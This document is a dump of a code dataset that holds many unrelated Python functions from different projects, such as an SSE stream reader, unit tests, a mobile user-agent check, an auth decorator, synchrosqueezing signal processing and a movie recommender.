content
stringlengths
22
815k
id
int64
0
4.91M
def repackage_hidden(h): """ Wraps hidden states in new Variables, to detach them from their history. """ if isinstance(h, torch.Tensor): return h.detach() else: return tuple(v.detach() for v in h)
23,900
def stream_raw_sse(mkrequest, *pargs, _last_event_id=None, headers=None, **kwargs): """ Streams Server-Sent Events, each event produced as a sequence of (field, value) pairs. Does not handle reconnection, etc. """ if headers is None: headers = {} headers['Accept'] = 'text/event-stream' headers['Cache-Control'] = 'no-cache' # Per https://html.spec.whatwg.org/multipage/server-sent-events.html#sse-processing-model if _last_event_id is not None: headers['Last-Event-ID'] = _last_event_id with mkrequest(*pargs, headers=headers, stream=True, **kwargs) as resp: fields = [] for line in resp.iter_lines(decode_unicode=True): # https://html.spec.whatwg.org/multipage/server-sent-events.html#event-stream-interpretation if not line: yield fields fields = [] elif line.startswith(':'): pass elif ':' in line: field, value = line.split(':', 1) if value.startswith(' '): value = value[1:] fields += [(field, value)] else: # Non-blank, without a colon fields += [(line, '')]
23,901
def test_exception_during_cleanup(capfd): """ Report exceptions during cleanup to stderr """ original_rmtree = shutil.rmtree delete_paths = [] def make_directory_unremoveable(path, *args, **kwargs): os.chmod(path, stat.S_IRUSR) # remove x permission so we can't delete directory delete_paths.append(path) return original_rmtree(path, *args, **kwargs) try: with mock.patch.object(main.shutil, 'rmtree', make_directory_unremoveable): run_command("- echo hello") out, err = capfd.readouterr() assert "Unable to remove" in err finally: for path in delete_paths: os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IEXEC) shutil.rmtree(path)
23,902
def support_acctgroup_acctproject(version): """ Whether this Lustre version supports acctgroup and acctproject """ if version.lv_name == "es2": return False return True
23,903
def print_partitions(dstore: Datastore, datasets: List[str]) -> None: """Prints known partition keys and its values for each of the datasets.""" for single_ds in datasets: parts = dstore.get_datapackage_descriptor(single_ds).get_partitions() print(f'\nPartitions for {single_ds} ({dstore.get_doi(single_ds)}):') for pkey in sorted(parts): print(f' {pkey}: {", ".join(str(x) for x in sorted(parts[pkey]))}') if not parts: print(' -- no known partitions --')
23,904
def decodeInventoryEntry_level1(document): """ Decodes a basic entry such as: '6 lobster cake' or '6' cakes @param document : NLP Doc object :return: Status if decoded correctly (true, false), and Inventory object """ count = Inventory(str(document)) for token in document: if token.pos_ == (u'NOUN' or u'NNS' or u'NN'): item = str(token) for child in token.children: if child.dep_ == u'compound' or child.dep_ == u'ad': item = str(child) + str(item) elif child.dep_ == u'nummod': count.amount = str(child).strip() for numerical_child in child.children: # this isn't arithmetic rather than treating it such as a string count.amount = str(numerical_child) + str(count.amount).strip() else: print "WARNING: unknown child: " + str(child) + ':'+str(child.dep_) count.item = item count.unit = item return count
23,905
def target_precheck(root_dir, configs_dir, target_name, info_defaults, required_scripts): """ Checks: 1. That the target (subsys or experiment) config includes an 'active' field indicating whether to run it 2. If the target is active, check that all required scripts are present and executable This function returns: 1. a dict containing a 'status' field (boolean, true if all is preconfigured correctly) and a 'message' containing an explanation as a string if one is necessary 2. A dict containing the target config's entries for each of the fields in info_defaults (uses the default if it's not specified) """ target_conf = attempt_parse_config(configs_dir, target_name) if target_conf is None: return ({'success': False, 'message': 'config.json for {} is missing or fails to parse'.format(target_name)}, None) update_fields = [] target_info = {} for field, default in info_defaults.items(): update_fields.append(field) target_info[field] = default for field in update_fields: if field in target_conf: target_info[field] = target_conf[field] # no need to check target subdirectory if it is not active if not target_conf['active']: return ({'success': True, 'message': 'Inactive'}, target_info) target_subdir = os.path.join(root_dir, target_name) if not os.path.exists(target_subdir): return ({'success': False, 'message': 'Script subdirectory for {} missing'.format(target_name)}, None) invalid_scripts = check_present_and_executable(target_subdir, required_scripts) if invalid_scripts: return ({ 'success': False, 'message': 'Necessary files are missing from {} or not executable: {}'.format( target_subdir, ', '.join(invalid_scripts)) }, None) return ({'success': True, 'message': ''}, target_info)
23,906
def test_thermoml_mole_constraints(): """A collection of tests to ensure that the Mole fraction constraint is implemented correctly alongside solvent constraints.""" # Mole fraction data_set = ThermoMLDataSet.from_file(get_data_filename("test/properties/mole.xml")) assert data_set is not None assert len(data_set) > 0 # Mole fraction + Solvent: Mass fraction data_set = ThermoMLDataSet.from_file( get_data_filename("test/properties/mole_mass.xml") ) assert data_set is not None assert len(data_set) > 0 # Mole fraction + Solvent: Mole fraction data_set = ThermoMLDataSet.from_file( get_data_filename("test/properties/mole_mole.xml") ) assert data_set is not None assert len(data_set) > 0 # Mole fraction + Solvent: Molality data_set = ThermoMLDataSet.from_file( get_data_filename("test/properties/mole_molality.xml") ) assert data_set is not None assert len(data_set) > 0
23,907
def from_ir_objs(ir_objs: Collection[IrCell]) -> AnnData: """\ Convert a collection of :class:`IrCell` objects to an :class:`~anndata.AnnData`. This is useful for converting arbitrary data formats into the scirpy :ref:`data-structure`. {doc_working_model} Parameters ---------- ir_objs Returns ------- :class:`~anndata.AnnData` object with :term:`IR` information in `obs`. """ ir_df = pd.DataFrame.from_records( (_process_ir_cell(x) for x in ir_objs), index="cell_id" ) adata = AnnData(obs=ir_df, X=np.empty([ir_df.shape[0], 0])) _sanitize_anndata(adata) return adata
23,908
def main(args): """ transforms the problem file template """ if len(args) < 1: # print errors to the error stream eprint("Usage: {0} <amounts-to-sum>".format(os.path.basename(sys.argv[0]))) exit(-1) # this is a simple example of an input data transformation in Python: amounts = [float(a.strip()) for a in args] name = 'pumps_' + '-'.join(args) # render the values into the template transformed = transform(name, amounts, input) # output the template to the standard output print(transformed) print("; This PDDL problem file was generated on", str(datetime.datetime.now()))
23,909
def s3_is_mobile_client(request): """ Simple UA Test whether client is a mobile device @todo: parameter description? """ env = request.env if env.http_x_wap_profile or env.http_profile: return True if env.http_accept and \ env.http_accept.find("text/vnd.wap.wml") > 0: return True keys = ["iphone", "ipod", "android", "opera mini", "blackberry", "palm", "windows ce", "iemobile", "smartphone", "medi", "sk-0", "vk-v", "aptu", "xda-", "mtv ", "v750", "p800", "opwv", "send", "xda2", "sage", "t618", "qwap", "veri", "t610", "tcl-", "vx60", "vx61", "lg-k", "lg-l", "lg-m", "lg-o", "lg-a", "lg-b", "lg-c", "xdag", "lg-f", "lg-g", "sl45", "emul", "lg-p", "lg-s", "lg-t", "lg-u", "lg-w", "6590", "t250", "qc21", "ig01", "port", "m1-w", "770s", "n710", "ez60", "mt50", "g1 u", "vk40", "bird", "tagt", "pose", "jemu", "beck", "go.w", "jata", "gene", "smar", "g-mo", "o2-x", "htc_", "hei-", "fake", "qc-7", "smal", "htcp", "htcs", "craw", "htct", "aste", "htca", "htcg", "teli", "telm", "kgt", "mwbp", "kwc-", "owg1", "htc ", "kgt/", "htc-", "benq", "slid", "qc60", "dmob", "blac", "smt5", "nec-", "sec-", "sec1", "sec0", "fetc", "spv ", "mcca", "nem-", "spv-", "o2im", "m50/", "ts70", "arch", "qtek", "opti", "devi", "winw", "rove", "winc", "talk", "pant", "netf", "pana", "esl8", "pand", "vite", "v400", "whit", "scoo", "good", "nzph", "mtp1", "doco", "raks", "wonu", "cmd-", "cell", "mode", "im1k", "modo", "lg-d", "idea", "jigs", "bumb", "sany", "vulc", "vx70", "psio", "fly_", "mate", "pock", "cdm-", "fly-", "i230", "lge-", "lge/", "argo", "qc32", "n701", "n700", "mc21", "n500", "midp", "t-mo", "airn", "bw-u", "iac", "bw-n", "lg g", "erk0", "sony", "alav", "503i", "pt-g", "au-m", "treo", "ipaq", "dang", "seri", "mywa", "eml2", "smb3", "brvw", "sgh-", "maxo", "pg-c", "qci-", "vx85", "vx83", "vx80", "vx81", "pg-8", "pg-6", "phil", "pg-1", "pg-2", "pg-3", "ds12", "scp-", "dc-s", "brew", "hipt", "kddi", "qc07", "elai", "802s", "506i", "dica", "mo01", "mo02", "avan", "kyoc", "ikom", "siem", "kyok", "dopo", "g560", "i-ma", "6310", "sie-", "grad", "ibro", "sy01", "nok6", "el49", "rim9", "upsi", "inno", "wap-", "sc01", "ds-d", "aur ", "comp", "wapp", "wapr", "waps", "wapt", "wapu", "wapv", "wapy", "newg", "wapa", "wapi", "wapj", "wapm", "hutc", "lg/u", "yas-", "hita", "lg/l", "lg/k", "i-go", "4thp", "bell", "502i", "zeto", "ez40", "java", "n300", "n302", "mmef", "pn-2", "newt", "1207", "sdk/", "gf-5", "bilb", "zte-", "maui", "qc-3", "qc-2", "blaz", "r600", "hp i", "qc-5", "moto", "cond", "motv", "virg", "ccwa", "audi", "shar", "i-20", "samm", "sama", "sams", "sch-", "mot ", "http", "505i", "mot-", "n502", "topl", "n505", "mobi", "3gso", "wmlb", "ezwa", "qc12", "abac", "tdg-", "neon", "mio8", "sp01", "rozo", "vx98", "dait", "t600", "anyw", "tx-9", "sava", "m-cr", "tsm-", "mioa", "tsm5", "klon", "capi", "tsm3", "hcit", "libw", "lg50", "mc01", "amoi", "lg54", "ez70", "se47", "n203", "vk52", "vk53", "vk50", "webc", "haie", "semc", "grun", "play", "palm", "a wa", "anny", "prox", "o2 x", "ezze", "symb", "hs-c", "pg13", "mits", "kpt ", "qa-a", "501i", "pdxg", "iris", "pluc", "acoo", "soft", "hpip", "iac/", "iac-", "aus ", "s55/", "vx53", "vx52", "chtm", "meri", "merc", "your", "huaw", "cldc", "voda", "smit", "x700", "mozz", "lexi", "up.b", "sph-", "keji", "jbro", "wig ", "attw", "pire", "r380", "lynx", "anex", "vm40", "hd-m", "504i", "w3c ", "c55/", "w3c-", "upg1", "t218", "tosh", "acer", "hd-t", "eric", "hd-p", "noki", "acs-", "dbte", "n202", "tim-", "alco", "ezos", "dall", "leno", "alca", "asus", "m3ga", "utst", "aiko", "n102", "n101", "n100", "oran"] ua = (env.http_user_agent or "").lower() if [key for key in keys if key in ua]: return True return False
23,910
def list_config(args): """ febo config """ # # add cwd to path # cwd = os.getcwd() # sys.path.insert(0, cwd) # print config print(config_manager.get_yaml(include_default=True)) if args.save: config_manager.write_yaml(args.save, include_default=True) print(f"Saved config to {args.save}.")
23,911
def welcome(): """List all available api routes.""" return ( f"Available Routes:<br/>" f"/api/v1.0/precipitation<br/>" f"/api/v1.0/stations<br/>" f"/api/v1.0/tobs<br/>" f"/api/v1.0/start<br/>" f"/api/v1.0/start/end" )
23,912
def get_cases_from_input_df(input_df: pd.DataFrame) -> List[Case]: """ Get the case attributes :return: """ cases: List[Case] = [] for index, row in input_df.iterrows(): # Create a case object from the row values in the input df cases.append(Case.from_dict(row.to_dict())) return cases
23,913
def transfer_J_values(source_net, target_net): """ Transfer the values of the interactions from source to target net. All the interactions corresponding to the `J` values of `source_net` are checked, and those interactions that are also active in `target_net` are copied into `target_net`. """ source_J = source_net.J.get_value() target_J = target_net.J.get_value() target_interactions = target_net.interactions for idx, J in enumerate(source_J): interaction = source_net.J_index_to_interaction(idx) # print(interaction) # if `interaction` is active in `target_net`, then we transfer # its value from `source_net` to `target_net`. if interaction in target_interactions: target_idx = target_net.tuple_to_J_index(interaction) target_J[target_idx] = J target_net.J.set_value(target_J)
23,914
def init_STRFNet(sample_batch, num_classes, num_kernels=32, residual_channels=[32, 32], embedding_dimension=1024, num_rnn_layers=2, frame_rate=None, bins_per_octave=None, time_support=None, frequency_support=None, conv2d_sizes=(3, 3), mlp_hiddims=[], activate_out=nn.LogSoftmax(dim=1) ): """Initialize a STRFNet for multi-class classification. This is a one-stop solution to create STRFNet and its variants. Parameters ---------- sample_batch: [Batch,Time,Frequency] torch.FloatTensor A batch of training examples that is used for training. Some dimension parameter of the network is inferred cannot be changed. num_classes: int Number of classes for the classification task. Keyword Parameters ------------------ num_kernels: int, 32 2*num_kernels is the number of STRF/2D kernels. Doubling is due to the two orientations of the STRFs. residual_channels: list(int), [32, 32] Specify the number of conv2d channels for each residual block. embedding_dimension: int, 1024 Dimension of the learned embedding (RNN output). frame_rate: float, None Sampling rate [samples/second] / hop size [samples]. No STRF kernels by default. bins_per_octave: int, None Frequency bins per octave in CQT sense. (TODO: extend for non-CQT rep.) No STRF kernels by default. time_support: float, None Number of seconds spanned by each STRF kernel. No STRF kernels by default. frequency_support: int/float, None If frame_rate or bins_per_octave is None, interpret as GaborSTRFConv. - Number of frequency bins (int) spanned by each STRF kernel. Otherwise, interpret as STRFConv. - Number of octaves spanned by each STRF kernel. No STRF kernels by default. conv2d_sizes: (int, int), (3, 3) nn.Conv2d kernel dimensions. mlp_hiddims: list(int), [] Final MLP hidden layer dimensions. Default has no hidden layers. activate_out: callable, nn.LogSoftmax(dim=1) Activation function at the final layer. Default uses LogSoftmax for multi-class classification. """ if all(p is not None for p in (time_support, frequency_support)): is_strfnet = True if all(p is not None for p in (frame_rate, bins_per_octave)): kernel_type = 'wavelet' else: assert all( type(p) is int for p in (time_support, frequency_support) ) kernel_type = 'gabor' else: is_strfnet = False is_cnn = conv2d_sizes is not None is_hybrid = is_strfnet and is_cnn if is_hybrid: print(f"Preparing for Hybrid STRFNet; kernel type is {kernel_type}.") elif is_strfnet: print(f"Preparing for STRFNet; kernel type is {kernel_type}.") elif is_cnn: print("Preparing for CNN.") else: raise ValueError("Insufficient parameters. Check example_STRFNet.") if not is_strfnet: strf_layer = None elif kernel_type == 'wavelet': strf_layer = STRFConv( frame_rate, bins_per_octave, time_support, frequency_support, num_kernels ) else: strf_layer = GaborSTRFConv( time_support, frequency_support, num_kernels ) if is_cnn: d1, d2 = conv2d_sizes if d1 % 2 == 0: d1 += 1 print("Enforcing odd conv2d dimension.") if d2 % 2 == 0: d2 += 1 print("Enforcing odd conv2d dimension.") conv2d_layer = nn.Conv2d( 1, 2*num_kernels, # Double to match the total number of STRFs (d1, d2), padding=(d1//2, d2//2) ) else: conv2d_layer = None residual_layer = ModResnet( (4 if is_hybrid else 2)*num_kernels, residual_channels, False ) with torch.no_grad(): flattened_dimension = STRFNet.cnn_forward( sample_batch, strf_layer, conv2d_layer, residual_layer ).shape[-1] linear_layer = nn.Linear(flattened_dimension, embedding_dimension) rnn = nn.GRU( embedding_dimension, embedding_dimension, batch_first=True, num_layers=num_rnn_layers, bidirectional=True ) mlp = MLP( 2*embedding_dimension, num_classes, hiddims=mlp_hiddims, activate_hid=nn.LeakyReLU(), activate_out=activate_out, batchnorm=[True]*len(mlp_hiddims) ) return STRFNet(strf_layer, conv2d_layer, residual_layer, linear_layer, rnn, mlp)
23,915
def test_execute_retry(mocked_get): """Test request retry.""" mocked_get.side_effect = Mock(side_effect=[ MagicMock(status_code=500, text=''), MagicMock(status_code=200, text='{}') ]) response = request.execute( max_retries=4, retry_interval=0, url='blabla', method='GET' ) assert response.status_code == 200 assert response.text == '{}' assert mocked_get.call_count == 2
23,916
def normalize_nfc(txt: AnyStr) -> bytes: """ Normalize message to NFC and return bytes suitable for protobuf. This seems to be bitcoin-qt standard of doing things. """ str_txt = txt.decode() if isinstance(txt, bytes) else txt return unicodedata.normalize("NFC", str_txt).encode()
23,917
def synchronized(wrapped: Callable[..., Any]) -> Any: """The missing @synchronized decorator https://git.io/vydTA""" _lock = threading.RLock() @functools.wraps(wrapped) def _wrapper(*args, **kwargs): with _lock: return wrapped(*args, **kwargs) return _wrapper
23,918
def test_remove_instance_from_recuid(): """remove an istance from an event which is specified via an additional VEVENT with the same UID (which we call `recuid` here""" event = Event.fromString(_get_text('event_rrule_recuid'), **EVENT_KWARGS) assert event.raw.split('\r\n').count('UID:event_rrule_recurrence_id') == 2 event.delete_instance(BERLIN.localize(dt.datetime(2014, 7, 7, 7, 0))) assert event.raw.split('\r\n').count('UID:event_rrule_recurrence_id') == 1 assert 'EXDATE;TZID=Europe/Berlin:20140707T070000' in event.raw.split('\r\n')
23,919
def corrgroups60__decision_tree(): """ Decision Tree """ return sklearn.tree.DecisionTreeRegressor(random_state=0)
23,920
def auth_required(*auth_methods): """ Decorator that protects enpoints through multiple mechanisms Example:: @app.route('/dashboard') @auth_required('token', 'session') def dashboard(): return 'Dashboard' :param auth_methods: Specified mechanisms. """ login_mechanisms = { 'token': lambda: _check_token(), 'basic': lambda: _check_http_auth(), 'session': lambda: current_user.is_authenticated() } def wrapper(fn): @wraps(fn) def decorated_view(*args, **kwargs): h = {} mechanisms = [(method, login_mechanisms.get(method)) for method in auth_methods] for method, mechanism in mechanisms: if mechanism and mechanism(): return fn(*args, **kwargs) elif method == 'basic': r = _security.default_http_auth_realm h['WWW-Authenticate'] = 'Basic realm="%s"' % r if _security._unauthorized_callback: return _security._unauthorized_callback() else: return _get_unauthorized_response(headers=h) return decorated_view return wrapper
23,921
def _get_default_data_dir_name(): """ Gets default data directory """ return _get_path(DATA_DIR)
23,922
def point_inside_triangle(p, t, tol=None): """ Test to see if a point is inside a triangle. The point is first projected to the plane of the triangle for this test. :param ndarray p: Point inside triangle. :param ndarray t: Triangle vertices. :param float tol: Tolerance for barycentric coordinate check. :return: *True* if point is inside triangle, *False* if not. :rtype: bool """ if tol is None: tol = Settings.ptol v01 = t[1] - t[0] v02 = t[2] - t[0] vp = p - t[0] d01 = dot(v01, v01) d12 = dot(v01, v02) d02 = dot(v02, v02) dp1 = dot(vp, v01) dp2 = dot(vp, v02) denom = d01 * d02 - d12 * d12 if denom == 0.: return False u = (d02 * dp1 - d12 * dp2) / denom v = (d01 * dp2 - d12 * dp1) / denom if u >= -tol and v >= -tol and u + v <= 1. + tol: return True return False
23,923
def test_authorize_query_joined_load(engine, oso, fixture_data): """Test a query involving multiple models.""" oso.load_str( """allow("user", "read", post: Post) if post.id = 1; allow("user", "read", user: User) if user.id = 0; allow("user", "read", user: User) if user.id = 1; allow("all_posts", "read", _: Post);""" ) session = AuthorizedSession(oso, "user", {Post: "read", User: "read"}, bind=engine) authorized = session.query(User).options(joinedload(User.posts)) print_query(authorized) print(authorized[0].posts) assert len(authorized[0].posts) == 1
23,924
def merge_dfs(x, y): """Merge the two dataframes and download a CSV.""" df = pd.merge(x, y, on='Collection_Number', how='outer') indexed_df = df.set_index(['Collection_Number']) indexed_df['Access_Notes_Regarding_Storage_Locations'].fillna('No note', inplace=True) today = datetime.datetime.today().strftime('%Y-%m-%d') output_file = 'storage_locations_' + str(today) + '.csv' indexed_df.to_csv(output_file) print('Location report exported as ' + output_file) return indexed_df
23,925
def consumer(func): """A decorator function that takes care of starting a coroutine automatically on call. See http://www.dabeaz.com/generators/ for more details. """ def start(*args, **kwargs): cr = func(*args, **kwargs) next(cr) return cr return start
23,926
def convert_openfermion_op(openfermion_op, n_qubits=None): """convert_openfermion_op Args: openfermion_op (:class:`openfermion.ops.QubitOperator`) n_qubit (:class:`int`): if None (default), it automatically calculates the number of qubits required to represent the given operator Returns: :class:`qulacs.GeneralQuantumOperator` """ if n_qubits is None: _n_qubits = _count_qubit_in_qubit_operator(openfermion_op) else: _n_qubits = n_qubits res = GeneralQuantumOperator(_n_qubits) for pauli_product in openfermion_op.terms: coef = float(np.real(openfermion_op.terms[pauli_product])) pauli_string = '' for pauli_operator in pauli_product: pauli_string += pauli_operator[1] + ' ' + str(pauli_operator[0]) pauli_string += ' ' res.add_operator(coef, pauli_string[:-1]) return res
23,927
def ssqueeze(Wx, w, ssq_freqs=None, scales=None, fs=None, t=None, transform='cwt', squeezing='sum'): """Calculates the synchrosqueezed CWT or STFT of `x`. Used internally by `synsq_cwt` and `synsq_stft_fwd`. # Arguments: Wx or Sx: np.ndarray CWT or STFT of `x`. w: np.ndarray Phase transform of `Wx` or `Sx`. Must be >=0. ssq_freqs: str['log', 'linear'] / np.ndarray / None Frequencies to synchrosqueeze CWT scales onto. Scale-frequency mapping is only approximate and wavelet-dependent. If None, will infer from and set to same distribution as `scales`. scales: str['log', 'linear'] / np.ndarray CWT scales. Ignored if transform='stft'. - 'log': exponentially distributed scales, as pow of 2: `[2^(1/nv), 2^(2/nv), ...]` - 'linear': linearly distributed scales. !!! EXPERIMENTAL; default scheme for len(x)>2048 performs poorly (and there may not be a good non-piecewise scheme). fs: float / None Sampling frequency of `x`. Defaults to 1, which makes ssq frequencies range from 1/dT to 0.5, i.e. as fraction of reference sampling rate up to Nyquist limit; dT = total duration (N/fs). Overridden by `t`, if provided. Relevant on `t` and `dT`: https://dsp.stackexchange.com/a/71580/50076 t: np.ndarray / None Vector of times at which samples are taken (eg np.linspace(0, 1, n)). Must be uniformly-spaced. Defaults to `np.linspace(0, len(x)/fs, len(x), endpoint=False)`. Overrides `fs` if not None. transform: str['cwt', 'stft'] Whether `Wx` is from CWT or STFT (`Sx`). squeezing: str['sum', 'lebesgue'] - 'sum' = standard synchrosqueezing using `Wx`. - 'lebesgue' = as in [4], setting `Wx=ones()/len(Wx)`, which is not invertible but has better robustness properties in some cases. Not recommended unless purpose is understood. # Returns: Tx: np.ndarray [nf x n] Synchrosqueezed CWT of `x`. (rows=~frequencies, cols=timeshifts) (nf = len(ssq_freqs); n = len(x)) `nf = na` by default, where `na = len(scales)`. ssq_freqs: np.ndarray [nf] Frequencies associated with rows of `Tx`. # References: 1. Synchrosqueezed Wavelet Transforms: a Tool for Empirical Mode Decomposition. I. Daubechies, J. Lu, H.T. Wu. https://arxiv.org/pdf/0912.2437.pdf 2. The Synchrosqueezing algorithm for time-varying spectral analysis: robustness properties and new paleoclimate applications. G. Thakur, E. Brevdo, N.-S. Fučkar, and H.-T. Wu. https://arxiv.org/abs/1105.0010 3. Synchrosqueezing-based Recovery of Instantaneous Frequency from Nonuniform Samples. G. Thakur and H.-T. Wu. https://arxiv.org/abs/1006.2533 4. Synchrosqueezing Toolbox, (C) 2014--present. E. Brevdo, G. Thakur. https://github.com/ebrevdo/synchrosqueezing/blob/master/synchrosqueezing/ synsq_squeeze.m """ def _ssqueeze(w, Wx, nv, ssq_freqs, transform, ssq_scaletype, cwt_scaletype): # incorporate threshold by zeroing out Inf values, so they get ignored Wx = replace_at_inf(Wx, ref=w, replacement=0) # do squeezing by finding which frequency bin each phase transform point # w[a, b] lands in (i.e. to which f in ssq_freqs each w[a, b] is closest) # equivalent to argmin(abs(w[a, b] - ssq_freqs)) for every a, b with np.errstate(divide='ignore'): k = (find_closest(w, ssq_freqs) if ssq_scaletype != 'log' else find_closest(np.log2(w), np.log2(ssq_freqs))) # Tx[k[i, j], j] += Wx[i, j] * norm if transform == 'cwt': # Eq 14 [2]; Eq 2.3 [1] if cwt_scaletype == 'log': # ln(2)/nv == diff(ln(scales))[0] == ln(2**(1/nv)) Tx = indexed_sum(Wx / scales**(1/2) * np.log(2) / nv, k) elif cwt_scaletype == 'linear': # omit /dw since it's cancelled by *dw in inversion anyway da = (scales[1] - scales[0]) Tx = indexed_sum(Wx / scales**(3/2) * da, k) else: # 'stft' # TODO validate Tx = indexed_sum(Wx * (ssq_freqs[1] - ssq_freqs[0]), k) return Tx def _compute_associated_frequencies(dt, na, N, transform, ssq_scaletype): dT = dt * N # normalized frequencies to map discrete-domain to physical: # f[[cycles/samples]] -> f[[cycles/second]] # maximum measurable (Nyquist) frequency of data fM = 1 / (2 * dt) # minimum measurable (fundamental) frequency of data fm = 1 / dT # frequency divisions `w_l` to search over in Synchrosqueezing if ssq_scaletype == 'log': # [fm, ..., fM] ssq_freqs = fm * np.power(fM / fm, np.arange(na) / (na - 1)) else: if transform == 'cwt': ssq_freqs = np.linspace(fm, fM, na) elif transform == 'stft': # ??? seems to be 0 to f_sampling/2, but why use N? # what about fm and fM? ssq_freqs = np.linspace(0, 1, N) / dt ssq_freqs = ssq_freqs[:N // 2] return ssq_freqs def _process_args(w, fs, t, N, transform, squeezing, scales): if w.min() < 0: raise ValueError("found negatives in `w`") if transform not in ('cwt', 'stft'): raise ValueError("`transform` must be one of: cwt, stft " "(got %s)" % squeezing) if squeezing not in ('sum', 'lebesgue'): raise ValueError("`squeezing` must be one of: sum, lebesgue " "(got %s)" % squeezing) if scales is None and transform == 'cwt': raise ValueError("`scales` can't be None if `transform == 'cwt'`") dt, *_ = _process_fs_and_t(fs, t, N) return dt na, N = Wx.shape dt = _process_args(w, fs, t, N, transform, squeezing, scales) scales, cwt_scaletype, _, nv = process_scales(scales, N, get_params=True) if not isinstance(ssq_freqs, np.ndarray): if isinstance(ssq_freqs, str): ssq_scaletype = ssq_freqs else: # default to same scheme used by `scales` ssq_scaletype = cwt_scaletype ssq_freqs = _compute_associated_frequencies(dt, na, N, transform, ssq_scaletype) else: ssq_scaletype = _infer_scaletype(ssq_freqs) if squeezing == 'lebesgue': # from reference [3] Wx = np.ones(Wx.shape) / len(Wx) Tx = _ssqueeze(w, Wx, nv, ssq_freqs, transform, ssq_scaletype, cwt_scaletype) return Tx, ssq_freqs
23,928
def ConvertStringsToColumnHeaders(proposed_headers): """Converts a list of strings to column names which spreadsheets accepts. When setting values in a record, the keys which represent column names must fit certain rules. They are all lower case, contain no spaces or special characters. If two columns have the same name after being sanitized, the columns further to the right have _2, _3 _4, etc. appended to them. If there are column names which consist of all special characters, or if the column header is blank, an obfuscated value will be used for a column name. This method does not handle blank column names or column names with only special characters. """ headers = [] for input_string in proposed_headers: # TODO: probably a more efficient way to do this. Perhaps regex. sanitized = input_string.lower().replace('_', '').replace( ':', '').replace(' ', '') # When the same sanitized header appears multiple times in the first row # of a spreadsheet, _n is appended to the name to make it unique. header_count = headers.count(sanitized) if header_count > 0: headers.append('%s_%i' % (sanitized, header_count+1)) else: headers.append(sanitized) return headers
23,929
def parse_interactions(filename="train.csv"): """ Parse the train data and return the interaction matrix alone """ with open(os.path.join(data_path, filename), "r") as f: # Discard first line lines = f.readlines()[1:] num_lines = len(lines) # Create container interactions = sp.dok_matrix((NUM_PLAYLIST, NUM_TRACKS), dtype=np.uint8) for i, line in enumerate(lines): playlist, track = [int(i) for i in line.split(",")] interactions[playlist, track] = 1 print("\rParsing interactions: {:.4}%".format((i / num_lines) * 100), end="") print("\n") # Return matrix return interactions
23,930
def recommend(uid, data, model, top_n = 100): """ Returns the mean and covariance matrix of the demeaned dataset X (e.g. for PCA) Parameters ---------- uid : int user id data : surprise object with data The entire system, ratings of users (Constructed with reader from surprise) model : susrprise object Trained algorithm top_n : int The number of movies to recommend Returns ------- pd.DataFrame recommended movies pd.DataFram predicted ratings for the recommended movies data_update predicted movies and ratings in the movielens format (uid, iid, rating) """ all_movie_ids = data.df['iid'].unique() uid_rated = data.df[data.df['uid'] == uid]['iid'] movies_to_recommend = np.setdiff1d(all_movie_ids, uid_rated) if len(movies_to_recommend) == 0: print('NO MOVIES TO RECOMMEND!') prediction_set = [[uid, iid, 0] for iid in movies_to_recommend] #here 0 is arbitrary, ratings don't matter predictions = model.test(prediction_set) pred_ratings = np.array([pred.est for pred in predictions]) top = pred_ratings.argsort()[::-1][:top_n] data_update = pd.DataFrame([[uid, movies_to_recommend[top][i], pred_ratings[top][i]] for i in range(top_n)], columns = ['uid', 'iid', 'rating']) return movies_to_recommend[top], pred_ratings[top], data_update
23,931
def threading_data(data=None, fn=None, thread_count=None, path = None): """Process a batch of data by given function by threading. Usually be used for data augmentation. Parameters ----------- data : numpy.array or others The data to be processed. thread_count : int The number of threads to use. fn : function The function for data processing. more args : the args for `fn` Ssee Examples below. Returns ------- list or numpyarray The processed results. References ---------- - `python queue <https://pymotw.com/2/Queue/index.html#module-Queue>`__ - `run with limited queue <http://effbot.org/librarybook/queue.htm>`__ """ def apply_fn(results, i, data, path): path = os.path.join(path, data) results[i] = fn(path) if thread_count is None: results = [None] * len(data) threads = [] # for i in range(len(data)): # t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, data[i], kwargs)) for i, d in enumerate(data): t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, d, path)) t.start() threads.append(t) else: divs = np.linspace(0, len(data), thread_count + 1) divs = np.round(divs).astype(int) results = [None] * thread_count threads = [] for i in range(thread_count): t = threading.Thread( name='threading_and_return', target=apply_fn, args=(results, i, data[divs[i]:divs[i + 1]], path) ) t.start() threads.append(t) for t in threads: t.join() if thread_count is None: try: return np.asarray(results, dtype=object) except Exception: return results else: return np.concatenate(results)
23,932
def read_line_from_stream(stream): """Read a line filtering out blank lines and comments """ for line in stream: line = line.strip() if len(line) > 0 and not line.startswith('#'): yield line
23,933
def cluster_info(arr): """ number of clusters (nonzero fields separated by 0s) in array and size of cluster """ data = [] k2coord = [] coord2k = np.empty_like(arr).astype(np.int64) k = -1 new_cluster = True for i in range(0,len(arr)): if arr[i] == 0: new_cluster = True coord2k[i] = -1 else: if new_cluster == True: k += 1 k2coord.append([i]) data.append(0) else: k2coord[k].append(i) data[k] += 1 coord2k[i] = k new_cluster = False Ncl = len(data) # number of clusters Nk = data # Nk[k] = size of cluster k return Ncl, Nk, k2coord, coord2k
23,934
def set_or_none(list_l): """Function to avoid list->set transformation to return set={None}.""" if list_l == [None]: res = None else: res = set(list_l) return res
23,935
def case_mismatch(vm_type, param): """Return True if vm_type matches a portion of param in a case insensitive search, but does not equal that portion; return False otherwise. The "portions" of param are delimited by "_". """ re_portion = re.compile( "(^(%(x)s)_)|(_(%(x)s)_)|(_(%(x)s)$)" % dict(x=vm_type), re.IGNORECASE ) found = re_portion.search(param) if found: param_vm_type = [x for x in found.groups()[1::2] if x][0] return param_vm_type != vm_type else: return False
23,936
def _async_os(cls): """ Aliases for aiofiles.os""" return aiofiles.os
23,937
def corruption_function(x: torch.Tensor): """ Applies the Gsaussian blur to x """ return torchdrift.data.functional.gaussian_blur(x, severity=5)
23,938
